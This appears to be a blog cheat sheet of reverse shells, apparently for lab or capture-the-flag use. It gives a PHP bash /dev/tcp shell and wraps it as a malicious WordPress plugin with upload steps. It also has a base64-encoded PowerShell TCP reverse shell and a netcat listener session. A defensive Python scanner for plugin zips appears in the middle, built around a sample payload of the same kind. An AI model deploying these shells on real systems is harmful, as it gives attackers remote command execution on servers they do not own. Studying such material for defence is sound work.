Reverse shells

(a work-in-progress list of some handy reverse shells)

ℹ️ Some nifty links

Opening

PHP

A generic PHP reverse shell where you can/should swap out the listening IP address and port:

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>

WordPress

For a WordPress plugin, you need to add a bit more info for it to load as a “valid” plugin, as outlined in the plugin development docs.

<?php
/**
* Plugin Name: reverse shell plugin
* Description: opens a reverse shell with bash
* Version: 0.1
* Author: some-natalie
* Author URI: https://some-natalie.dev
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>

Zip that PHP file, then upload the zipped file as a plugin.

This lovely malicious WordPress plugin generator works well on some versions of WordPress and not others. The boring one above works a bit more uniformly, but is nowhere near as full of features.
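A defender-side check for the upload path described above, as an added example that is not part of the original post: it opens a plugin archive before installation and reports PHP files that spawn a process or reference bash's /dev/tcp device. The function names and the in-memory sample archive (using the documentation address 192.0.2.10) are constructed for illustration.

```python
import io
import re
import zipfile

# PHP functions that start an OS process.
EXEC_CALL = re.compile(r"\b(exec|system|shell_exec|passthru|popen|proc_open)\s*\(", re.I)
# bash's /dev/tcp/<host>/<port> pseudo-device, as used in the snippets above.
DEV_TCP = re.compile(r"/dev/tcp/([\w.\-]+)/(\d{1,5})")
# Header field WordPress uses to recognise a plugin's main file.
PLUGIN_NAME = re.compile(r"^[ \t/*#@]*Plugin Name:\s*(.+)$", re.M)


def audit_plugin_zip(data: bytes) -> list[dict]:
    """Return one finding per PHP file that spawns a process or uses /dev/tcp."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for info in archive.infolist():
            if info.is_dir() or not info.filename.lower().endswith((".php", ".phtml")):
                continue
            source = archive.read(info).decode("utf-8", errors="replace")
            calls = sorted({m.group(1).lower() for m in EXEC_CALL.finditer(source)})
            endpoints = [f"{h}:{p}" for h, p in DEV_TCP.findall(source)]
            if not calls and not endpoints:
                continue
            header = PLUGIN_NAME.search(source)
            findings.append({"file": info.filename, "exec_calls": calls, "endpoints": endpoints,
                             "plugin_name": header.group(1).strip() if header else None})
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample: one clean file, one shaped like the plugin above."""
    shell = ("<?php\n/**\n * Plugin Name: constructed sample\n */\n"
             "exec(\"/bin/bash -c 'bash -i >& /dev/tcp/192.0.2.10/8080 0>&1'\");\n?>")
    clean = "<?php\n// Plugin Name lookup helper\nfunction hello() { return 'hi'; }\n"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("sample/sample.php", shell)
        archive.writestr("sample/includes/util.php", clean)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in audit_plugin_zip(build_sample_zip()):
        print(finding)
```

Treat a hit as a triage signal rather than a verdict: legitimate plugins also call these functions, and obfuscated code will not match the patterns.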

PowerShell

$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.236",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)

$EncodedText = [Convert]::ToBase64String($Bytes)

$EncodedText

Catching

netcat

ᐅ nc -l 8080
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8b8f280a8848:/var/www/html/wp-admin$ cat /tmp/flag
cat /tmp/flag
flag{a sneaky flag has appeared}

This post is licensed under CC BY 4.0 by the author.